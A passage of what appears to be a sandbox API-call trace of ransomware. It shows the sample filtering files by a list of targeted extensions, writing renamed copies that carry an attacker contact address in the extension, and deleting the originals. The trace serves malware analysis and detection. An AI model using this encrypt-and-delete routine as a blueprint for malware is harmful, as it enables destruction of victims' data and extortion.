returned 63 [0262.240] lstrlenW (lpString=".dbf") returned 4 [0262.240] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0262.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.240] lstrlenW (lpString=".1cd") returned 4 [0262.240] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0262.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.240] lstrlenW (lpString=".jpg") returned 4 [0262.240] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0262.241] lstrcmpiW (lpString1=".JPG", lpString2=".php") returned -1 [0262.241] lstrlenW (lpString="J0145895.JPG") returned 12 [0262.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0262.241] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=33958) returned 1 [0262.241] CloseHandle (hObject=0x38c) returned 1 [0262.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg")) returned 0x20 [0262.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0262.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0262.241] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.241] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0262.242] GetLastError () returned 0x0 [0262.242] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x84a6, lpOverlapped=0x0) returned 1 [0262.244] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x84b0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x84b0, lpOverlapped=0x0) returned 1 [0262.245] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0262.245] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0262.245] SetEndOfFile (hFile=0x37c) returned 1 [0262.247] CloseHandle (hObject=0x37c) returned 1 [0262.247] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.247] SetEndOfFile (hFile=0x38c) returned 1 [0262.249] CloseHandle (hObject=0x38c) returned 1 [0262.249] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0262.249] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg")) returned 1 [0262.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.250] lstrlenW (lpString=".doc") returned 4 [0262.250] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0262.250] lstrlenW (lpString=".docx") returned 5 [0262.250] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0262.250] lstrlenW (lpString=".pdf") returned 4 [0262.250] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0262.250] lstrlenW (lpString=".xls") returned 4 [0262.250] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0262.250] lstrlenW (lpString=".xlsx") returned 5 [0262.250] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0262.250] lstrlenW (lpString=".ppt") returned 4 [0262.250] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0262.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.250] lstrlenW (lpString=".zip") returned 4 [0262.250] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0262.250] lstrlenW (lpString=".rar") returned 4 [0262.250] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0262.250] lstrlenW (lpString=".bz2") returned 4 [0262.250] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0262.250] lstrlenW (lpString=".7z") returned 3 [0262.250] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0262.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.250] lstrlenW (lpString=".dbf") returned 4 [0262.250] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0262.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.250] lstrlenW (lpString=".1cd") returned 4 [0262.250] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0262.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.251] lstrlenW (lpString=".jpg") returned 4 [0262.251] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0262.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.251] lstrlenW (lpString=".doc") returned 4 [0262.251] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0262.251] lstrlenW (lpString=".docx") returned 5 [0262.251] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0262.251] lstrlenW (lpString=".pdf") returned 4 [0262.251] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0262.251] lstrlenW (lpString=".xls") returned 4 [0262.251] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0262.251] lstrlenW (lpString=".xlsx") returned 5 [0262.251] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0262.251] lstrlenW (lpString=".ppt") returned 4 [0262.251] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0262.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.251] lstrlenW (lpString=".zip") returned 4 [0262.251] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0262.251] lstrlenW (lpString=".rar") returned 4 [0262.251] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0262.251] lstrlenW (lpString=".bz2") returned 4 [0262.251] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0262.251] lstrlenW (lpString=".7z") returned 3 [0262.251] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0262.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.251] lstrlenW (lpString=".dbf") returned 4 [0262.251] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0262.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.251] lstrlenW (lpString=".1cd") returned 4 [0262.251] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0262.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63 [0262.252] lstrlenW (lpString=".jpg") returned 4 [0262.252] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0262.252] lstrcmpiW (lpString1=".JPG", lpString2=".php") returned -1 [0262.252] lstrlenW (lpString="J0145904.JPG") returned 12 [0262.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0262.252] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=39542) returned 1 [0262.252] CloseHandle (hObject=0x38c) returned 1 [0262.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg")) returned 0x20 [0262.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0262.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0262.253] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.253] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0262.253] GetLastError () returned 0x0 [0262.253] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x9a76, lpOverlapped=0x0) returned 1 [0262.255] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x9a80, lpOverlapped=0x0) returned 1 [0262.256] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0262.256] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0262.257] SetEndOfFile (hFile=0x37c) returned 1 [0262.257] CloseHandle (hObject=0x37c) returned 1 [0262.257] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.257] SetEndOfFile (hFile=0x38c) returned 1 [0262.259] CloseHandle (hObject=0x38c) returned 1 [0262.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0262.259] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg")) returned 1 [0262.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.260] lstrlenW (lpString=".doc") returned 4 [0262.260] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0262.260] lstrlenW (lpString=".docx") returned 5 [0262.260] lstrcmpiW (lpString1=".docx", lpString2="4.JPG") returned -1 [0262.260] lstrlenW (lpString=".pdf") returned 4 [0262.260] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0262.260] lstrlenW (lpString=".xls") returned 4 [0262.260] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0262.260] lstrlenW (lpString=".xlsx") returned 5 [0262.260] lstrcmpiW (lpString1=".xlsx", lpString2="4.JPG") returned -1 [0262.260] lstrlenW (lpString=".ppt") returned 4 [0262.260] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0262.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.260] lstrlenW (lpString=".zip") returned 4 [0262.260] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0262.260] lstrlenW (lpString=".rar") returned 4 [0262.260] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0262.260] lstrlenW (lpString=".bz2") returned 4 [0262.260] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0262.260] lstrlenW (lpString=".7z") returned 3 [0262.260] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0262.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.260] lstrlenW (lpString=".dbf") returned 4 [0262.260] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0262.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.260] lstrlenW (lpString=".1cd") returned 4 [0262.260] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0262.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.260] lstrlenW (lpString=".jpg") returned 4 [0262.260] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0262.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.261] lstrlenW (lpString=".doc") returned 4 [0262.261] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0262.261] lstrlenW (lpString=".docx") returned 5 [0262.261] lstrcmpiW (lpString1=".docx", lpString2="4.JPG") returned -1 [0262.261] lstrlenW (lpString=".pdf") returned 4 [0262.261] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0262.261] lstrlenW (lpString=".xls") returned 4 [0262.261] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0262.261] lstrlenW (lpString=".xlsx") returned 5 [0262.261] lstrcmpiW (lpString1=".xlsx", lpString2="4.JPG") returned -1 [0262.261] lstrlenW (lpString=".ppt") returned 4 [0262.261] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0262.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.261] lstrlenW (lpString=".zip") returned 4 [0262.261] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0262.261] lstrlenW (lpString=".rar") returned 4 [0262.261] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0262.261] lstrlenW (lpString=".bz2") returned 4 [0262.261] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0262.261] lstrlenW (lpString=".7z") returned 3 [0262.261] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0262.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.261] lstrlenW (lpString=".dbf") returned 4 [0262.261] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0262.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.261] lstrlenW (lpString=".1cd") returned 4 [0262.261] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0262.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63 [0262.261] lstrlenW (lpString=".jpg") returned 4 [0262.261] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0262.262] lstrcmpiW (lpString1=".JPG", lpString2=".php") returned -1 [0262.262] lstrlenW (lpString="J0146142.JPG") returned 12 [0262.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0262.262] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=46508) returned 1 [0262.262] CloseHandle (hObject=0x38c) returned 1 [0262.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg")) returned 0x20 [0262.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0262.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0262.262] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.262] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0262.263] GetLastError () returned 0x0 [0262.263] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0xb5ac, lpOverlapped=0x0) returned 1 [0262.901] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xb5b0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xb5b0, lpOverlapped=0x0) returned 1 [0262.902] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0262.902] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0262.902] SetEndOfFile (hFile=0x37c) returned 1 [0263.222] CloseHandle (hObject=0x37c) returned 1 [0263.229] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.229] SetEndOfFile (hFile=0x38c) returned 1 [0263.253] CloseHandle (hObject=0x38c) returned 1 [0263.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.253] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg")) returned 1 [0263.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.254] lstrlenW (lpString=".doc") returned 4 [0263.254] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0263.254] lstrlenW (lpString=".docx") returned 5 [0263.254] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0263.254] lstrlenW (lpString=".pdf") returned 4 [0263.254] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0263.254] lstrlenW (lpString=".xls") returned 4 [0263.254] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0263.254] lstrlenW (lpString=".xlsx") returned 5 [0263.254] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0263.254] lstrlenW (lpString=".ppt") returned 4 [0263.254] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0263.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.254] lstrlenW (lpString=".zip") returned 4 [0263.254] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0263.254] lstrlenW (lpString=".rar") returned 4 [0263.254] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0263.254] lstrlenW (lpString=".bz2") returned 4 [0263.254] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0263.254] lstrlenW (lpString=".7z") returned 3 [0263.254] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0263.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.255] lstrlenW (lpString=".dbf") returned 4 [0263.255] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0263.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.255] lstrlenW (lpString=".1cd") returned 4 [0263.255] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0263.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.255] lstrlenW (lpString=".jpg") returned 4 [0263.255] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0263.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.255] lstrlenW (lpString=".doc") returned 4 [0263.255] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0263.255] lstrlenW (lpString=".docx") returned 5 [0263.255] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0263.255] lstrlenW (lpString=".pdf") returned 4 [0263.255] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0263.255] lstrlenW (lpString=".xls") returned 4 [0263.255] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0263.255] lstrlenW (lpString=".xlsx") returned 5 [0263.255] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0263.255] lstrlenW (lpString=".ppt") returned 4 [0263.255] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0263.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.255] lstrlenW (lpString=".zip") returned 4 [0263.255] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0263.255] lstrlenW (lpString=".rar") returned 4 [0263.255] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0263.255] lstrlenW (lpString=".bz2") returned 4 [0263.255] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0263.255] lstrlenW (lpString=".7z") returned 3 [0263.255] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0263.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.256] lstrlenW (lpString=".dbf") returned 4 [0263.256] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0263.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.256] lstrlenW (lpString=".1cd") returned 4 [0263.256] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0263.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63 [0263.256] lstrlenW (lpString=".jpg") returned 4 [0263.256] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0263.256] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.256] lstrlenW (lpString="J0151067.WMF") returned 12 [0263.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 